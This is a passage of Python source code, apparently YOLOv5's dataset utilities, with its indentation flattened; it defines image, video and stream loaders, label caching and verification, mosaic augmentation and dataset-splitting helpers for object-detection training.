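#   train_loader, dataset = create_dataloader('../datasets/coco128/images/train2017',
#                                             imgsz=640, batch_size=16, stride=32,
#                                             hyp=hyp_dict, augment=True, workers=4,
#                                             prefix='train: ')
#   for imgs, targets, paths, shapes in train_loader:
#       pass  # imgs: uint8 BCHW tensor; targets: (n, 6) rows of (batch_idx, cls, x, y, w, h)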
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
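# Hedged usage sketch for LoadImages (the source path is a placeholder):
#
#   dataset = LoadImages('data/images', img_size=640, stride=32)
#   for path, img, img0, vid_cap, s in dataset:
#       pass  # img: letterboxed CHW RGB uint8 array; img0: original BGR frame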
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = int(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = int(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps[i] = max(cap.get(cv2.CAP_PROP_FPS) % 100, 0) or 30.0 # 30 FPS fallback
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] *= 0
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
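# Example of the convention img2label_paths encodes (illustrative path only):
#   img2label_paths(['../datasets/coco128/images/train/im0.jpg'])
#   -> ['../datasets/coco128/labels/train/im0.txt']
# i.e. the last '/images/' path component becomes '/labels/' and the image suffix becomes '.txt'.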
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.img_files) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
logging.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs, self.img_npy = [None] * n, [None] * n
if cache_images:
if cache_images == 'disk':
self.im_cache_dir = Path(Path(self.img_files[0]).parent.as_posix() + '_npy')
self.img_npy = [self.im_cache_dir / Path(f).with_suffix('.npy').name for f in self.img_files]
self.im_cache_dir.mkdir(parents=True, exist_ok=True)
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(NUM_THREADS).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
if not self.img_npy[i].exists():
np.save(self.img_npy[i].as_posix(), x[0])
gb += self.img_npy[i].stat().st_size
else:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.img_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.img_files))
for im_file, l, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [l, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if msgs:
logging.info('\n'.join(msgs))
if nf == 0:
logging.info(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, len(self.img_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *load_mosaic(self, random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
# to [x, y, w, h] normalized
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
npy = self.img_npy[i]
if npy and npy.exists(): # load npy
im = np.load(npy)
else: # read image
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, f'Image Not Found {path}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../datasets/coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../datasets/coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../datasets/coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
l = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
nl = len(l)
if nl:
assert l.shape[1] == 5, f'labels require 5 columns, {l.shape[1]} columns detected'
assert (l >= 0).all(), f'negative label values {l[l < 0]}'
assert (l[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {l[:, 1:][l[:, 1:] > 1]}'
l = np.unique(l, axis=0) # remove duplicate rows
if len(l) < nl:
segments = np.unique(segments, axis=0)
msg = f'{prefix}WARNING: {im_file}: {nl - len(l)} duplicate labels removed'
else:
ne = 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
return im_file, l, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('../datasets/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, quality=75) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
